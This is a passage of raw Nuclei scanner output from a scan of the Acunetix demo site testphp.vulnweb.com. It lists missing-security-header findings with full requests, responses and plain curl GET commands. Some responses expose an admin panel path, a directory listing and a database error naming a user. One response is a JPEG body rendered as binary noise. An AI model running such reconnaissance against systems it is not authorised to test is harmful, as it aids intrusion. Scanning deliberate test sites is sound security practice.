vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:56.015742915Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:56.01576224Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /_mmServerScripts/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /_mmServerScripts/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"MMHTTPDB.php\\\"\\u003eMMHTTPDB.php\\u003c/a\\u003e 11-May-2011 10:27 2111\\r\\n\\u003ca href=\\\"mysql.php\\\"\\u003emysql.php\\u003c/a\\u003e 11-May-2011 10:27 10634\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:56.015805785Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:57.180532177Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testphp.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:57.18059677Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:57.180600189Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0001\\u0005\\u0003\\u0004\\u0007\\u0002\\ufffd\\ufffd\\u00004\\u0010\\u0000\\u0002\\u0001\\u0003\\u0004\\u0001\\u0003\\u0003\\u0003\\u0003\\u0004\\u0001\\u0005\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!1A\\u0006\\u0013Q\\\"a\\ufffd\\u0014q\\ufffd2\\ufffd\\ufffd#BR\\ufffd\\ufffd\\u0016b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0019\\u0001\\u0000\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0005\\ufffd\\ufffd\\u0000)\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0002\\u0005\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0012A\\u0005\\u0013Q\\ufffd\\ufffd2aq\\ufffd\\\"3\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u003e\\ufffd\\ufffdn?\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ԝB\\ufffdw\\u0018Va\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd.\\ufffdH\\ufffdn\\t \\ufffd\\ufffdr2s\\ufffd\\u0006\\ufffd\\ufffdP\\u0003z\\ufffd\\ufffd8\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0006$}#\\ufffd\\ufffd\\ufffd\\ufffdW\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd\\ufffdc ʸʮ\\u003c\\ufffd\\ufffd\\ufffd\\ufffd׹Er\\ufffd\\n/\\ufffdI\\ufffd\\ufffd\\ufffdj\\ufffd\\u0026\\ufffd\\ufffd\\ufffddY\\u0019@\\ufffdW\\ufffd\\ufffd#\\ufffdr\\u003e\\ufffdϚ\\ufffd\\ufffdlN^}\\ufffd\\u0015\\ufffd#3(|g\\ufffdp0rpO\\ufffd\\ufffdf\\ufffd\\ufffd}%%\\ufffd\\u0006kIE\\ufffdf\\ufffd\\u0010\\ufffd\\u0003\\ufffd\\ufffd\\u0007\\u001f\\ufffd\\ufffd\\u0006\\ufffdzf\\ufffd\\ufffd^\\ufffdC%Ƕ\\ufffd\\u0019\\u00140;C\\u001d\\ufffd\\u0018\\ufffd?\\ufffd\\ufffd\\ufffdz\\ufffd\\\\\\\\[\\ufffd\\ufffd\\u00025\\ufffdy.\\\\\\ufffd\\u00169۟\\ufffd8\\u001fڮ\\ufffd?\\ufffd\\u0019L3\\\\\\ufffd\\ufffd\\ufffd\\u0019#\\u00110\\ufffd\\\\x\\ufffd\\ufffd8\\ufffd#\\ufffd\\u001b\\ufffdZ\\u0015Ʃ|\\ufffd\\u001e5 夑\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdդ\\ufffd=\\u003e\\ufffd\\u001bI\\ufffdi\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n2\\u0006\\u0007۳\\ufffdO^(\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffdP\\ufffd.\\ufffd\\ufffd_fEUR\\u0002}9\\ufffd\\ufffdr6\\ufffd\\ufffd\\ufffd\\ufffd\\u003ej\\ufffdg\\ufffd$g\\ufffd\\u0017$\\ufffd\\u000e\\ufffd{\\ufffd\\ufffd[\\ufffdL\\ufffd\\ufffd\\ufffd9\\ufffd,sXi\\u0026\\u0014y\\ufffd\\ufffd\\ufffdT\\ufffdb*E\\u0014VH\\ufffd\\ufffd퍌\\ufffdI,\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffd0\\u0007\\u0007\\ufffd\\ufffd\\ufffd?\\ufffd\\u0015\\ufffd;\\ufffd\\ufffd\\u0017]\\ufffdJ\\ufffdX\\ufffd\\ufffdFd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$`c\\ufffd\\ufffd2\\ufffd0գ\\ufffd7\\u0016\\ufffdnח\\\"ј;2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp;'9\\u0018\\ufffdz\\ufffd\\u0014\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd[)\\ufffd3Z\\ufffdorEY\\u000c\\ufffd\\u001e|\\u0011\\ufffdq\\ufffd|\\u001e\\ufffd\\ufffda\\u001e\\ufffdu$-\\u000bJ\\ufffd\\u001f;\\ufffd\\ufffd\\u0000p\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffdT\\ufffd\\ufffd\\ufffd\\\"\\ufffdM\\ufffd\\ufffd1\\ufffd06\\ufffdۉ\\u0001O\\u0000\\ufffdg\\u001c\\ufffd\\ufffd\\ufffdN\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd]\\ufffd%ܰ\\ufffd\\ufffdH\\u0010s\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015S\\ufffdz\\ufffdi\\ufffd%\\ufffd@\\ufffd\\ufffd@G\\ufffd\\u0007`,@#'\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdl\\u0004\\ufffdX\\ufffdX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\u0014\\ufffdA\\ufffdU\\ufffd\\\\6i\\nٱ\\ufffd\\ufffd-~\\\"2ƂDP\\ufffd\\ufffd`\\ufffd\\u0000\\u0003\\ufffd\\u0001\\ufffd\\ufffdV׿\\u0015\\u0014$\\ufffdm\\ufffd\\ufffdIsr\\ufffd0Uf\\ufffd\\ufffd\\u0014\\u0003\\ufffd\\ufffd.\\ufffdsq\\ufffd\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd]\\ufffd8\\u001fj\\ufffd\\u0006\\ufffd\\ufffdb\\ufffd/,\\ufffd\\u001e\\ufffd\\ufffd]B\\u0015\\\"\\ufffd\\ufffd\\nS\\ufffdp\\ufffd\\ufffd\\u003e3\\ufffd\\u0000\\\\S\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd6\\ufffdRI[\\u000258\\ufffd\\ufffd\\u0000\\u000b\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003cbDxAiJ\\ufffd\\u0026\\ufffdn8\\u000b\\ufffd\\u0007\\ufffd\\ufffd\\ufffd' f\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffd,jR\\u0018\\ufffd\\u0015Oǎ\\u0007\\u0003\\ufffd:\\ufffd\\ufffd\\ufffd+\\u001fO\\ufffdb\\ufffd\\ufffd\\u0017z\\ufffd\\ufffdF\\u0014\\ufffd\\u000bI\\u0003,b1\\ufffdS#$\\u00022\\t\\ufffd3\\ufffdq\\ufffd\\ufffd ^\\u0016$\\ufffd'\\ufffd\\ufffd\\u001e\\ufffdԭ\\ufffd-೾\\ufffdi\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\u0013g\\u00039##\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd?L\\ufffdH\\ufffd\\u0000D\\ufffd\\ufffdO\\ufffdIw\\ufffd\\u0000S}D\\ufffd\\ufffd\\u0000\\r\\ufffdpz\\ufffd\\ufffd\\u0010\\ufffdA\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\u001a\\ufffda\\ufffdto\\ufffd^\\ufffd\\ufffd\\ufffdv\\ufffd~\\ufffd1\\ufffd\\ufffd\\u0000\\ufffd\\u003c\\ufffd\\u000f\\ufffdU\\\\Zl\\ufffdh\\ufffd%\\ufffd\\u001e񊫊o\\u00004\\ufffd暮\\ufffdKD\\ufffd\\ufffdS\\ufffd\\ufffda\\ufffd,\\ufffd\\\"\\ufffdr\\\\\\u0004\\u001f\\ufffdT\\u001f\\u003c\\u000c\\ufffd\\ufffd\\ufffd\\u001aV\\ufffdK\\ufffd\\ufffd'\\ufffd*qEn\\ufffd\\u0000\\ufffd\\u0014b\\ufffd\\ufffd(\\ufffdՎ\\u000c\\ufffd\\u0018\\ufffd3\\ufffdg\\u0015Ҵ\\ufffd\\u001d,\\\\$\\ufffdE\\ufffd\\ufffd\\ufffd}\\ufffd\\ufffd\\u00021\\ufffdO\\u001d\\ufffdۏ\\ufffd\\ufffd\\ufffd\\u0004]'G\\ufffd\\ufffd\\ufffd\\ufffdx!wH\\ufffd\\u0007j\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\u0004wz\\\\x\\u0018B\\ufffd\\ufffd\\ufffd\\u0014dy\\ufffd\\ufffdG\\ufffd\\ufffd-\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003eL\\ufffdMR\\ufffd!\\ufffd\\ufffd\\ufffdKh\\ufffd$\\u0026]\\ufffdI\\ufffd\\u0002\\n\\ufffds\\ufffd\\ufffd?ǐ+\\ufffdkz5\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffdR\\ufffd\\u0007!b\\ufffdNJ\\ufffd\\u001b\\ufffd\\